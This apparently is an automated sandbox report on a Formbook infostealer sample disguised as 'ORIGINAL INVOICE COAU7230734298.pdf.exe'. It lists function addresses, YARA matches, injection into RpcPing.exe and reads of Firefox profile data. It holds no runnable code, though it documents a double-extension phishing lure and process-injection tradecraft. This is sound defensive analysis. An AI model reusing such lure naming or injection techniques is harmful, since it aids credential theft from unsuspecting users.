            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A99C323_2_01A99C32
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADFFB13_2_01ADFFB1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A21F923_2_01A21F92
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_019E3FD53_2_019E3FD5
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_019E3FD23_2_019E3FD2
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADFF093_2_01ADFF09
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A29EB03_2_01A29EB0
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F6C017_2_036F6C01
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F8BDE7_2_036F8BDE
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036FF27E7_2_036FF27E
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036FF27B7_2_036FF27B
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F89BE7_2_036F89BE
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F89B57_2_036F89B5
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_0370109E7_2_0370109E
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_0371752E7_2_0371752E
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F6DA47_2_036F6DA4
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F6C5E7_2_036F6C5E
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AE03E68_2_03AE03E6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A2E3F08_2_03A2E3F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADA3528_2_03ADA352
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AA02C08_2_03AA02C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC02748_2_03AC0274
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AE01AA8_2_03AE01AA
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD41A28_2_03AD41A2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD81CC8_2_03AD81CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A101008_2_03A10100
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ABA1188_2_03ABA118
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AA81588_2_03AA8158
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AB20008_2_03AB2000
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A1C7C08_2_03A1C7C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A207708_2_03A20770
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A447508_2_03A44750
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3C6E08_2_03A3C6E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AE05918_2_03AE0591
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A205358_2_03A20535
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ACE4F68_2_03ACE4F6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC44208_2_03AC4420
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD24468_2_03AD2446
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD6BD78_2_03AD6BD7
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADAB408_2_03ADAB40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A1EA808_2_03A1EA80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A229A08_2_03A229A0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AEA9A68_2_03AEA9A6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A369628_2_03A36962
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A068B88_2_03A068B8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A4E8F08_2_03A4E8F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A228408_2_03A22840
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A2A8408_2_03A2A840
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A9EFA08_2_03A9EFA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A12FC88_2_03A12FC8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A62F288_2_03A62F28
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A40F308_2_03A40F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC2F308_2_03AC2F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A94F408_2_03A94F40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A32E908_2_03A32E90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADCE938_2_03ADCE93
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADEEDB8_2_03ADEEDB
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADEE268_2_03ADEE26
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A20E598_2_03A20E59
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A38DBF8_2_03A38DBF
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A1ADE08_2_03A1ADE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A2AD008_2_03A2AD00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ABCD1F8_2_03ABCD1F
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC0CB58_2_03AC0CB5
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A10CF28_2_03A10CF2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A20C008_2_03A20C00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A6739A8_2_03A6739A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD132D8_2_03AD132D
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A0D34C8_2_03A0D34C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A252A08_2_03A252A0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC12ED8_2_03AC12ED
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3D2F08_2_03A3D2F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3B2C08_2_03A3B2C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A2B1B08_2_03A2B1B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AEB16B8_2_03AEB16B
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A5516C8_2_03A5516C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A0F1728_2_03A0F172
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD70E98_2_03AD70E9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADF0E08_2_03ADF0E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ACF0CC8_2_03ACF0CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A270C08_2_03A270C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADF7B08_2_03ADF7B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD16CC8_2_03AD16CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A656308_2_03A65630
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ABD5B08_2_03ABD5B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AE95C38_2_03AE95C3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD75718_2_03AD7571
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADF43F8_2_03ADF43F
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A114608_2_03A11460
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3FB808_2_03A3FB80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A95BF08_2_03A95BF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A5DBF98_2_03A5DBF9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADFB768_2_03ADFB76
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A65AA08_2_03A65AA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ABDAAC8_2_03ABDAAC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC1AA38_2_03AC1AA3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ACDAC68_2_03ACDAC6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A93A6C8_2_03A93A6C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADFA498_2_03ADFA49
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD7A468_2_03AD7A46
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AB59108_2_03AB5910
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A299508_2_03A29950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3B9508_2_03A3B950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A238E08_2_03A238E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A8D8008_2_03A8D800
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADFFB18_2_03ADFFB1
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A21F928_2_03A21F92
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_039E3FD58_2_039E3FD5
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_039E3FD28_2_039E3FD2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADFF098_2_03ADFF09
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A29EB08_2_03A29EB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3FDC08_2_03A3FDC0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD7D738_2_03AD7D73
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A23D408_2_03A23D40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD1D5A8_2_03AD1D5A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADFCF28_2_03ADFCF2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A99C328_2_03A99C32
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_032717C08_2_032717C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326C7478_2_0326C747
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326C7508_2_0326C750
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326AB368_2_0326AB36
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326C9708_2_0326C970
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326A9ED8_2_0326A9ED
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326A9F08_2_0326A9F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03274E308_2_03274E30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0328B2C08_2_0328B2C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0327300D8_2_0327300D
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_032730108_2_03273010
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3038E8_2_03D3038E
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3E3348_2_03D3E334
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3E7EC8_2_03D3E7EC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D4552D8_2_03D4552D
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D454BD8_2_03D454BD
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3E4538_2_03D3E453
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3CAE88_2_03D3CAE8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3CA8A8_2_03D3CA8A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3D8588_2_03D3D858
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058CF4899_2_058CF489
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058D0CD99_2_058D0CD9
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058D0CD69_2_058D0CD6
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058CA4199_2_058CA419
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058CA4109_2_058CA410
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058E8F899_2_058E8F89
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058C87FF9_2_058C87FF
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058C86B99_2_058C86B9
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058C86B69_2_058C86B6
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058CA6399_2_058CA639
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058D2AF99_2_058D2AF9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: String function: 01A9F290 appears 103 times
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: String function: 01A55130 appears 58 times
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: String function: 01A67E54 appears 107 times
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: String function: 01A0B970 appears 262 times
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: String function: 01A8EA12 appears 86 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03A8EA12 appears 86 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03A0B970 appears 262 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03A67E54 appears 107 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03A55130 appears 58 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03A9F290 appears 103 times
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000000.1663240818.00000000002DE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1688616532.00000000008EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693835243.0000000007420000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.0000000001B0D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRpcPing.exej% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Binary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@5/4
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORIGINAL INVOICE COAU7230734298.pdf.exe.log
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Mutant created: NULL
            Source: C:\Windows\SysWOW64\RpcPing.exe File created: C:\Users\user\AppData\Local\Temp\297268BLQ
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
